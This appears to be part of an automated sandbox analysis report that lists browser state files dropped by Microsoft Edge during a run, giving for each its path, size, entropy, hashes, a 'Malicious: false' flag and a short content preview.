Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2a7c920b-5da0-4219-8540-f48002384029.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090760753546619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMQwuF9hDO6vP6O+8tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEO6Ntbz8hu3VlXr4CRo1
MD5:	FF06141689970FFC988042BABECD1FCE
SHA1:	34B311470B4D15C7964568552039E05761352069
SHA-256:	AC67C402643ACBAF82EC745D9AC82C0D19BC5E78E49230CF6FE02F57A248CD6A
SHA-512:	9B958C8C7B14044F77DF6A50E6A0E50E5355AB4B1964ED277D29D82694BC74B210A960F703A3010335B2E9692B8C2CF567184560DAC34DB4DAECFF6633FCC3DE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\340ba587-8d8f-42a9-97d6-02a9d8f2bdf2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45549
Entropy (8bit):	6.092175564139195
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9MH9uqhDO6vP6OxXFF3+jquHzFGvMncGoup1Xl3jVL:b/Ps+wsI7yO9MG6vF0chu3VlXr4CRo4
MD5:	5135AE0F92F7ABC099A93BB4A70DE045
SHA1:	C77B0911B158C899513FA193D86B4E8DA7A338A8
SHA-256:	1ED32780046097876D661FA56C4E3732BFDA74A6B93F21AA13FA2F7F36BBDB5A
SHA-512:	3E38216820BB9E1468808083F474FD9EA48C702B63AF6A8184511D6DA15DC03391520A1539332B8BB43B25115329EFEF57ECCE4AA58DF458C09F3E44B3B63358
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4c27e09b-be05-4f3b-bfeb-b51de28c95bd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44616
Entropy (8bit):	6.095286842174666
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBEwuRhDO6vP6OxXFFT8RShxoORcGoup1Xl3jVzXr2:z/Ps+wsI7ynEB6vFJchu3VlXr4CRo1
MD5:	635624367719367F640480D439A287F4
SHA1:	063AAB7F2D137D98960DD4AA5B8AD556690B7E77
SHA-256:	DDEEF33B38C8A2C1A7B4B37DBB6093DE1DB4890B50EBC7C390B3BD7F19F715B8
SHA-512:	A3DFD6C7B2AA671330B190F74DC6281205B5BFE865CB48927877671E22D1A154AB1A0367ED2B9E7D7B5FDA26DD9AE349CBD8E18C58965FB9995248DC6DCF44F1
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4f3522f3-3571-44ae-9a6d-ac0aed35340d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44698
Entropy (8bit):	6.094820816986969
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkBMwuRhDO6vP6OxXFF3+jquHzFGvMncGoup1Xl3jVu:z/Ps+wsI7yOEZ6vF0chu3VlXr4CRo1
MD5:	B2BD4EAD80231A5B518AEB1D125677E3
SHA1:	1E6FADAA5D8110B12F013B8E0765B50F8537B07B
SHA-256:	E3221774651CEC014CBFC2E99A81A735CFBB04D43AE73F48960E4835F6A4407A
SHA-512:	D8D6E60CC2CBF21349A2E3F4F0363CA03911AC60F2E6DCE6917CDE2777DB2D0D83B20BCCBA59FBB70A389C9490EC97D20464F25CD0D8DF0ECE5F4ED4583CA72E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9d933bbb-130d-4e72-8d8f-f94770eb553c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44616
Entropy (8bit):	6.095286842174666
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBEwuRhDO6vP6OxXFFT8RShxoORcGoup1Xl3jVzXr2:z/Ps+wsI7ynEB6vFJchu3VlXr4CRo1
MD5:	635624367719367F640480D439A287F4
SHA1:	063AAB7F2D137D98960DD4AA5B8AD556690B7E77
SHA-256:	DDEEF33B38C8A2C1A7B4B37DBB6093DE1DB4890B50EBC7C390B3BD7F19F715B8
SHA-512:	A3DFD6C7B2AA671330B190F74DC6281205B5BFE865CB48927877671E22D1A154AB1A0367ED2B9E7D7B5FDA26DD9AE349CBD8E18C58965FB9995248DC6DCF44F1
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	845CFA59D6B52BD2E8C24AC83A335C66
SHA1:	6882BB1CE71EB14CEF73413EFC591ACF84C63C75
SHA-256:	29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
SHA-512:	8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5e16eab5-7a8b-48a8-914d-2f249f10775d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\78d39e75-4f81-41e5-87db-3e235b0d40e4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.570737307576812
Encrypted:	false
SSDEEP:	768:hItpACWP9Vfdk8F1+UoAYDCx9Tuqh0VfUC9xbog/OVmS+H+rwqIpHtuZ:hItpACWP9Vfdku1jaNfHbqstS
MD5:	968BE262F4FE7951926D807DC6D490AA
SHA1:	BEAEA2E90BAAF7CD7CD2F6C64714E5394ADC3327
SHA-256:	4E6C1CBEBE4ED1321A6AEF88AAB27839BD993660E68029AA56F90999AB92B18E
SHA-512:	E8EDB302EB2A63BEC7ACBE0F3478A4402B38C75C699D3DBAB686AC0EB0CCF1216B20C7FAEB56D8B468D353AE21B681E7CED09155E35589A3892D891FED270FE3
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375211577814654","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375211577814654","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	358860
Entropy (8bit):	5.3246188724864725
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R5:C1gAg1zfvR
MD5:	05C96DEBEBD41207E16E3C5B4701B46A
SHA1:	71E57CDC5DF6AF1CA26B2CCE71442C1F56D6B527
SHA-256:	858796A655E43D9B8CA961161880E7092001ABC2EAD74EED7212796B0C42407F
SHA-512:	498799E6DD97D5CBAE5B3AD66F23A40A27A33B39C9CB17BB1EECAF2ACC3FA3BB112C2D3D684BDEE6A738CBD74B81CDD520AEFD1BEDC017D5D4AAE4252FEE78BB
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\365edfd6-8c97-43f6-b77c-690e06480270.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\79546551-e0bb-4041-9a9b-e73755174186.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF5045c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\edba3c0e-9001-49ee-948b-6d253b39d940.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9713
Entropy (8bit):	5.115172260313591
Encrypted:	false
SSDEEP:	192:stLkdpjsUnsZihUkeCe8CbV+Fg8QA66W6aFIMYAP3YJ:stLQjsUnfhCbGvQx6W6aTYJ
MD5:	584838E88AFF9E1494F77112F38AAFD3
